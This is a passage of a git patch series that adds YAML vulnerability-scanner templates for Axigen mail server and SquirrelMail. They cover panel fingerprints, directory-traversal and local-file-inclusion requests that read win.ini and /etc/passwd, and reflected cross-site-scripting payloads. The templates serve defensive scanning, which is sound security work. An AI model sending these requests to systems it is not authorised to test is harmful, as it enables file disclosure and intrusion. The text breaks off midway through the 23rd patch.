From 23c4a52aff483d7fa3a59c3e26eb1d6f9f87b6d3 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 15 Nov 2021 21:10:50 +0530
Subject: [PATCH 01/24] Create axigen-webmail.yaml

---
 exposed-panels/axigen-webmail.yaml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 exposed-panels/axigen-webmail.yaml

diff --git a/exposed-panels/axigen-webmail.yaml b/exposed-panels/axigen-webmail.yaml
new file mode 100644
index 0000000000..9db33d1bd4
--- /dev/null
+++ b/exposed-panels/axigen-webmail.yaml
@@ -0,0 +1,24 @@
+id: axigen-webmail
+
+info:
+  name: Axigen WebMail
+  author: dhiyaneshDk
+  severity: info
+  tags: axigen,panel
+  metadata:
+    shodan-query: 'http.title:"Axigen WebMail"'
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Axigen WebMail</title>'
+
+      - type: status
+        status:
+          - 200

From 1d8f4a1b01d18625b5b1ab3b132d4653d7c9ba12 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 15 Nov 2021 21:13:34 +0530
Subject: [PATCH 02/24] Create axigen-webadmin.yaml

---
 exposed-panels/axigen-webadmin.yaml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 exposed-panels/axigen-webadmin.yaml

diff --git a/exposed-panels/axigen-webadmin.yaml b/exposed-panels/axigen-webadmin.yaml
new file mode 100644
index 0000000000..130d6959d9
--- /dev/null
+++ b/exposed-panels/axigen-webadmin.yaml
@@ -0,0 +1,24 @@
+id: axigen-webadmin
+
+info:
+  name: Axigen Web Admin
+  author: dhiyaneshDk
+  severity: info
+  tags: axigen,panel
+  metadata:
+    shodan-query: 'http.title:"Axigen&nbsp;WebAdmin"'
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Axigen&nbsp;WebAdmin</title>'
+
+      - type: status
+        status:
+          - 200

From c89128eaea50d8906da66d9c0d54891cd5073cf5 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 15 Nov 2021 21:17:27 +0530
Subject: [PATCH 03/24] Create CVE-2012-4940.yaml

---
 cves/2012/CVE-2012-4940.yaml | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 cves/2012/CVE-2012-4940.yaml

diff --git a/cves/2012/CVE-2012-4940.yaml b/cves/2012/CVE-2012-4940.yaml
new file mode 100644
index 0000000000..5701fe8566
--- /dev/null
+++ b/cves/2012/CVE-2012-4940.yaml
@@ -0,0 +1,23 @@
+id: CVE-2012-4940
+
+info:
+  name: Axigen Mail Server - 'Filename' Directory Traversal
+  author: dhiyaneshDk
+  severity: high
+  tags: axigen,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini"
+      - "{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini"
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
+        part: body

From 0f5ae5efbac228af6b9fd69942f6aeef7feadb95 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 15 Nov 2021 21:18:14 +0530
Subject: [PATCH 04/24] Update CVE-2012-4940.yaml

---
 cves/2012/CVE-2012-4940.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/cves/2012/CVE-2012-4940.yaml b/cves/2012/CVE-2012-4940.yaml
index 5701fe8566..f33bf7d5f4 100644
--- a/cves/2012/CVE-2012-4940.yaml
+++ b/cves/2012/CVE-2012-4940.yaml
@@ -4,6 +4,7 @@ info:
   name: Axigen Mail Server - 'Filename' Directory Traversal
   author: dhiyaneshDk
   severity: high
+  reference: https://www.exploit-db.com/exploits/37996
   tags: axigen,lfi
 
 requests:

From 8f0c36f0365a4251fdf75c4da04d4363cfa6fba0 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Mon, 15 Nov 2021 15:49:39 +0000
Subject: [PATCH 05/24] Auto Generated CVE annotations [Mon Nov 15 15:49:39 UTC
 2021] :robot:

---
 cves/2012/CVE-2012-4940.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/cves/2012/CVE-2012-4940.yaml b/cves/2012/CVE-2012-4940.yaml
index f33bf7d5f4..868fe8c819 100644
--- a/cves/2012/CVE-2012-4940.yaml
+++ b/cves/2012/CVE-2012-4940.yaml
@@ -6,6 +6,7 @@ info:
   severity: high
   reference: https://www.exploit-db.com/exploits/37996
   tags: axigen,lfi
+  description: "Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI."
 
 requests:
   - method: GET

From 4b4d7fc7c31a5f2cc1c654592136475d568c712b Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Mon, 15 Nov 2021 22:31:08 +0530
Subject: [PATCH 06/24] misc fix

---
 cves/2012/CVE-2012-4940.yaml | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/cves/2012/CVE-2012-4940.yaml b/cves/2012/CVE-2012-4940.yaml
index 868fe8c819..58679a3d38 100644
--- a/cves/2012/CVE-2012-4940.yaml
+++ b/cves/2012/CVE-2012-4940.yaml
@@ -4,22 +4,22 @@ info:
   name: Axigen Mail Server - 'Filename' Directory Traversal
   author: dhiyaneshDk
   severity: high
+  description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI.
   reference: https://www.exploit-db.com/exploits/37996
-  tags: axigen,lfi
-  description: "Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI."
+  tags: cve,cve2012,axigen,lfi
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini"
-      - "{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini"
+      - '{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini'
+      - '{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini'
 
     stop-at-first-match: true
     matchers:
       - type: word
+        part: body
         words:
           - "bit app support"
           - "fonts"
           - "extensions"
-        condition: and
-        part: body
+        condition: and
\ No newline at end of file

From a0ce5a2918178f6d59d652d131955159e510a930 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 15 Nov 2021 23:39:04 +0530
Subject: [PATCH 07/24] Create CVE-2002-1131.yaml

---
 cves/2002/CVE-2002-1131.yaml | 34 ++++++++++++++++++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 cves/2002/CVE-2002-1131.yaml

diff --git a/cves/2002/CVE-2002-1131.yaml b/cves/2002/CVE-2002-1131.yaml
new file mode 100644
index 0000000000..b59119eaf9
--- /dev/null
+++ b/cves/2002/CVE-2002-1131.yaml
@@ -0,0 +1,34 @@
+id: CVE-2002-1131
+
+info:
+  name: SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities
+  author: dhiyaneshDk
+  severity: medium
+  reference: https://www.exploit-db.com/exploits/21811
+  description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+  tags: xss,squirrelmail
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/src/addressbook.php?"><script>alert('document.domain')</script><!--'
+      - '{{BaseURL}}/src/options.php?optpage=<script>alert('document.domain')</script>'
+      - '{{BaseURL}}/src/search.php?mailbox=<script>alert('document.domain')</script>&what=x&where=BODY&submit=Search'
+      - '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=<script>alert('document.domain')</script>&submit=Search'
+      - '{{BaseURL}}/src/help.php?chapter=<script>alert('document.domain')</script>'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "<script>alert('document.domain')</script>"
+        part: body
+
+      - type: word
+        words:
+          - "text/html"
+        part: header

From fcbbb3475cdfb24fd5eedbde9344a69df74e2fe8 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 15 Nov 2021 23:40:09 +0530
Subject: [PATCH 08/24] Create squirrelmail-lfi.yaml

---
 .../squirrelmail/squirrelmail-lfi.yaml        | 26 +++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 vulnerabilities/squirrelmail/squirrelmail-lfi.yaml

diff --git a/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml b/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml
new file mode 100644
index 0000000000..01c9309a08
--- /dev/null
+++ b/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml
@@ -0,0 +1,26 @@
+id: squirrelmail-lfi
+
+info: 
+  name: SquirrelMail 1.2.11 Local File Inclusion
+  author: dhiyaneshDk
+  severity: high
+  reference: https://www.exploit-db.com/exploits/22793
+  tags: lfi,squirrelmail
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/src/read_body.php?mailbox=/etc/passwd&passed_id=1&"
+      - "{{BaseURL}}/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

From fc2f0a0ea3099b581b3991e2b23023cfdf385076 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 15 Nov 2021 23:40:49 +0530
Subject: [PATCH 09/24] Create CVE-2006-2842.yaml

---
 cves/2006/CVE-2006-2842.yaml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 cves/2006/CVE-2006-2842.yaml

diff --git a/cves/2006/CVE-2006-2842.yaml b/cves/2006/CVE-2006-2842.yaml
new file mode 100644
index 0000000000..cbc06e695a
--- /dev/null
+++ b/cves/2006/CVE-2006-2842.yaml
@@ -0,0 +1,24 @@
+id: CVE-2006-2842
+
+info: 
+  name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
+  author: dhiyaneshDk
+  severity: high
+  reference: https://www.exploit-db.com/exploits/27948
+  tags: cve2006,lfi,squirrelmail
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

From 8b4f86274d7aa235c54c879a41526b751126c87e Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Mon, 15 Nov 2021 18:12:13 +0000
Subject: [PATCH 10/24] Auto Generated CVE annotations [Mon Nov 15 18:12:13 UTC
 2021] :robot:

---
 cves/2006/CVE-2006-2842.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/cves/2006/CVE-2006-2842.yaml b/cves/2006/CVE-2006-2842.yaml
index cbc06e695a..6952294696 100644
--- a/cves/2006/CVE-2006-2842.yaml
+++ b/cves/2006/CVE-2006-2842.yaml
@@ -6,6 +6,7 @@ info:
   severity: high
   reference: https://www.exploit-db.com/exploits/27948
   tags: cve2006,lfi,squirrelmail
+  description: "** DISPUTED **  PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter.  NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled.  Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE.  However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable."
 
 requests:
   - method: GET

From 89501ea414e4767eb86e5cb4bf76007e798347ac Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 15 Nov 2021 23:44:18 +0530
Subject: [PATCH 11/24] Create CVE-2004-0519.yaml

---
 cves/2004/CVE-2004-0519.yaml | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 cves/2004/CVE-2004-0519.yaml

diff --git a/cves/2004/CVE-2004-0519.yaml b/cves/2004/CVE-2004-0519.yaml
new file mode 100644
index 0000000000..955f79a7ed
--- /dev/null
+++ b/cves/2004/CVE-2004-0519.yaml
@@ -0,0 +1,28 @@
+id: CVE-2004-0519
+
+info:
+  name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
+  author: dhiyaneshDk
+  severity: medium
+  reference: https://www.exploit-db.com/exploits/24068
+  tags: xss,squirrelmail,cve2006
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/mail/src/compose.php?mailbox=">&lt;script&gt;window.alert(document.domain)&lt;/script&gt;'
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "alert('document.domain')"
+        part: body
+
+      - type: word
+        words:
+          - "text/html"
+        part: header

From c003036a7efd2032e0bb59fe0b254c00f4f75f93 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 15 Nov 2021 23:44:51 +0530
Subject: [PATCH 12/24] Create squirrelmail-vkeyboard-xss.yaml

---
 .../squirrelmail-vkeyboard-xss.yaml           | 29 +++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml

diff --git a/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml b/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml
new file mode 100644
index 0000000000..c3a58accda
--- /dev/null
+++ b/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml
@@ -0,0 +1,29 @@
+id: squirrelmail-vkeyboard-xss
+
+info:
+  name: SquirrelMail 1.4.2 Address Add Plugin - 'add.php' Cross-Site Scripting
+  author: dhiyaneshDk
+  severity: medium
+  reference: https://www.exploit-db.com/exploits/26305
+  description: SquirrelMail Address Add Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+  tags: xss,squirrelmail
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/plugins/address_add/add.php?first=HOVER%20ME!%22%20onMouseOver=%22alert('document.domain');'
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "alert('document.domain')"
+        part: body
+
+      - type: word
+        words:
+          - "text/html"
+        part: header

From ea8b5134ba23a1a7a596f4f1c4c7be8fc72a3748 Mon Sep 17 00:00:00 2001
From: GitHub Action <action@github.com>
Date: Mon, 15 Nov 2021 18:16:11 +0000
Subject: [PATCH 13/24] Auto Generated CVE annotations [Mon Nov 15 18:16:11 UTC
 2021] :robot:

---
 cves/2004/CVE-2004-0519.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/cves/2004/CVE-2004-0519.yaml b/cves/2004/CVE-2004-0519.yaml
index 955f79a7ed..4186e2fe5a 100644
--- a/cves/2004/CVE-2004-0519.yaml
+++ b/cves/2004/CVE-2004-0519.yaml
@@ -6,6 +6,7 @@ info:
   severity: medium
   reference: https://www.exploit-db.com/exploits/24068
   tags: xss,squirrelmail,cve2006
+  description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
 
 requests:
   - method: GET

From 36c96f5dd8898c1fbbe5f9c902ec87c79f466921 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 15 Nov 2021 23:57:48 +0530
Subject: [PATCH 14/24] Rename squirrelmail-vkeyboard-xss.yaml to
 squirrelmail-add-xss.yaml

---
 ...{squirrelmail-vkeyboard-xss.yaml => squirrelmail-add-xss.yaml} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename vulnerabilities/squirrelmail/{squirrelmail-vkeyboard-xss.yaml => squirrelmail-add-xss.yaml} (100%)

diff --git a/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml b/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml
similarity index 100%
rename from vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml
rename to vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml

From 1905c9321a792cf8c93a355a8fa3672b98c7c57e Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Mon, 15 Nov 2021 23:58:18 +0530
Subject: [PATCH 15/24] Create squirrelmail-vkeyboard-xss.yaml

---
 .../squirrelmail-vkeyboard-xss.yaml           | 29 +++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml

diff --git a/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml b/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml
new file mode 100644
index 0000000000..3d6154c2a3
--- /dev/null
+++ b/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml
@@ -0,0 +1,29 @@
+id: squirrelmail-vkeyboard-xss
+
+info:
+  name: SquirrelMail Virtual Keyboard Plugin - 'vkeyboard.php' Cross-Site Scripting
+  author: dhiyaneshDk
+  severity: medium
+  reference: https://www.exploit-db.com/exploits/34814
+  description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+  tags: xss,squirrelmail
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/plugins/vkeyboard/vkeyboard.php?passformname=%22%3E%3Cscript%3Ealert%28%27document.domain%27%29;%3C/script%3E%3Cscript%3E/*%20'
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "<script>alert('document.domain');</script>"
+        part: body
+
+      - type: word
+        words:
+          - "text/html"
+        part: header

From 1ad9dc577ce0066737cbfc9a99c32468a40bed87 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Tue, 16 Nov 2021 00:07:46 +0530
Subject: [PATCH 16/24] Update CVE-2006-2842.yaml

---
 cves/2006/CVE-2006-2842.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cves/2006/CVE-2006-2842.yaml b/cves/2006/CVE-2006-2842.yaml
index 6952294696..fe57273e03 100644
--- a/cves/2006/CVE-2006-2842.yaml
+++ b/cves/2006/CVE-2006-2842.yaml
@@ -1,6 +1,6 @@
 id: CVE-2006-2842
 
-info: 
+info:
   name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
   author: dhiyaneshDk
   severity: high

From 32715528d8c8d74058c06775209befb87c791259 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Tue, 16 Nov 2021 00:10:15 +0530
Subject: [PATCH 17/24] Update squirrelmail-lfi.yaml

---
 vulnerabilities/squirrelmail/squirrelmail-lfi.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml b/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml
index 01c9309a08..39c58f0758 100644
--- a/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml
+++ b/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml
@@ -1,6 +1,6 @@
 id: squirrelmail-lfi
 
-info: 
+info:
   name: SquirrelMail 1.2.11 Local File Inclusion
   author: dhiyaneshDk
   severity: high

From 77e5352a78cedc85ac58579f9947abf33a593579 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <cyberbossprince@gmail.com>
Date: Tue, 16 Nov 2021 15:13:47 +0530
Subject: [PATCH 18/24] Update squirrelmail-vkeyboard-xss.yaml

---
 .../squirrelmail/squirrelmail-vkeyboard-xss.yaml           | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml b/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml
index 3d6154c2a3..b52889fbf8 100644
--- a/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml
+++ b/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml
@@ -4,14 +4,15 @@ info:
   name: SquirrelMail Virtual Keyboard Plugin - 'vkeyboard.php' Cross-Site Scripting
   author: dhiyaneshDk
   severity: medium
-  reference: https://www.exploit-db.com/exploits/34814
   description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+  reference: https://www.exploit-db.com/exploits/34814
   tags: xss,squirrelmail
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/plugins/vkeyboard/vkeyboard.php?passformname=%22%3E%3Cscript%3Ealert%28%27document.domain%27%29;%3C/script%3E%3Cscript%3E/*%20'
+      - '{{BaseURL}}/plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
     matchers-condition: and
     matchers:
       - type: status
@@ -20,7 +21,7 @@ requests:
 
       - type: word
         words:
-          - "<script>alert('document.domain');</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

From dfea5262ab5cef919542c491504f7ab15da2c40b Mon Sep 17 00:00:00 2001
From: Prince Chaddha <cyberbossprince@gmail.com>
Date: Tue, 16 Nov 2021 15:30:41 +0530
Subject: [PATCH 19/24] Update squirrelmail-add-xss.yaml

---
 .../squirrelmail/squirrelmail-add-xss.yaml            | 11 ++++++-----
 1 file changed, 6 insertions(+), 5 deletions(-)

diff --git a/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml b/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml
index c3a58accda..811f02cb35 100644
--- a/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml
+++ b/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml
@@ -4,14 +4,15 @@ info:
   name: SquirrelMail 1.4.2 Address Add Plugin - 'add.php' Cross-Site Scripting
   author: dhiyaneshDk
   severity: medium
-  reference: https://www.exploit-db.com/exploits/26305
   description: SquirrelMail Address Add Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+  reference: https://www.exploit-db.com/exploits/26305
   tags: xss,squirrelmail
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/plugins/address_add/add.php?first=HOVER%20ME!%22%20onMouseOver=%22alert('document.domain');'
+      - '{{BaseURL}}/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
     matchers-condition: and
     matchers:
       - type: status
@@ -19,11 +20,11 @@ requests:
           - 200
 
       - type: word
-        words:
-          - "alert('document.domain')"
         part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
 
       - type: word
+        part: header
         words:
           - "text/html"
-        part: header

From 1083ccf4dea0cbeac77c88595c97420962b0e640 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <cyberbossprince@gmail.com>
Date: Tue, 16 Nov 2021 15:31:05 +0530
Subject: [PATCH 20/24] Update axigen-webmail.yaml

---
 exposed-panels/axigen-webmail.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/exposed-panels/axigen-webmail.yaml b/exposed-panels/axigen-webmail.yaml
index 9db33d1bd4..859ced9706 100644
--- a/exposed-panels/axigen-webmail.yaml
+++ b/exposed-panels/axigen-webmail.yaml
@@ -4,9 +4,9 @@ info:
   name: Axigen WebMail
   author: dhiyaneshDk
   severity: info
-  tags: axigen,panel
   metadata:
     shodan-query: 'http.title:"Axigen WebMail"'
+  tags: axigen,panel
 
 requests:
   - method: GET

From fe7dad579346a3ba0265c487cb4f26dfc4307944 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <cyberbossprince@gmail.com>
Date: Tue, 16 Nov 2021 15:31:39 +0530
Subject: [PATCH 21/24] Update axigen-webadmin.yaml

---
 exposed-panels/axigen-webadmin.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/exposed-panels/axigen-webadmin.yaml b/exposed-panels/axigen-webadmin.yaml
index 130d6959d9..5aa5cc7b3e 100644
--- a/exposed-panels/axigen-webadmin.yaml
+++ b/exposed-panels/axigen-webadmin.yaml
@@ -4,9 +4,9 @@ info:
   name: Axigen Web Admin
   author: dhiyaneshDk
   severity: info
-  tags: axigen,panel
   metadata:
     shodan-query: 'http.title:"Axigen&nbsp;WebAdmin"'
+  tags: axigen,panel
 
 requests:
   - method: GET

From 98621de740982a960fce79e8fec7fddfef95cec8 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <cyberbossprince@gmail.com>
Date: Tue, 16 Nov 2021 15:40:56 +0530
Subject: [PATCH 22/24] Update CVE-2002-1131.yaml

---
 cves/2002/CVE-2002-1131.yaml | 21 +++++++++++----------
 1 file changed, 11 insertions(+), 10 deletions(-)

diff --git a/cves/2002/CVE-2002-1131.yaml b/cves/2002/CVE-2002-1131.yaml
index b59119eaf9..d289fe5b5f 100644
--- a/cves/2002/CVE-2002-1131.yaml
+++ b/cves/2002/CVE-2002-1131.yaml
@@ -4,19 +4,20 @@ info:
   name: SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities
   author: dhiyaneshDk
   severity: medium
-  reference: https://www.exploit-db.com/exploits/21811
   description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
-  tags: xss,squirrelmail
+  reference: https://www.exploit-db.com/exploits/21811
+  tags: xss,squirrelmail,cve,cve2002
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/src/addressbook.php?"><script>alert('document.domain')</script><!--'
-      - '{{BaseURL}}/src/options.php?optpage=<script>alert('document.domain')</script>'
-      - '{{BaseURL}}/src/search.php?mailbox=<script>alert('document.domain')</script>&what=x&where=BODY&submit=Search'
-      - '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=<script>alert('document.domain')</script>&submit=Search'
-      - '{{BaseURL}}/src/help.php?chapter=<script>alert('document.domain')</script>'
+      - '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'
+      - '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'
+      - '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: status
@@ -24,11 +25,11 @@ requests:
           - 200
 
       - type: word
-        words:
-          - "<script>alert('document.domain')</script>"
         part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
 
       - type: word
+        part: header
         words:
           - "text/html"
-        part: header

From cad1f660302dfc2548bf3a9c6062ebd3ad2d0a4f Mon Sep 17 00:00:00 2001
From: Prince Chaddha <cyberbossprince@gmail.com>
Date: Tue, 16 Nov 2021 15:43:03 +0530
Subject: [PATCH 23/24] Update CVE-2004-0519.yaml

---
 cves/2004/CVE-2004-0519.yaml | 13 +++++++------
 1 file changed, 7 insertions(+), 6 deletions(-)

diff --git a/cves/2004/CVE-2004-0519.yaml b/cves/2004/CVE-2004-0519.yaml
index 4186e2fe5a..86da54f93e 100644
--- a/cves/2004/CVE-2004-0519.yaml
+++ b/cves/2004/CVE-2004-0519.yaml
@@ -4,14 +4,15 @@ info:
   name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
   author: dhiyaneshDk
   severity: medium
-  reference: https://www.exploit-db.com/exploits/24068
-  tags: xss,squirrelmail,cve2006
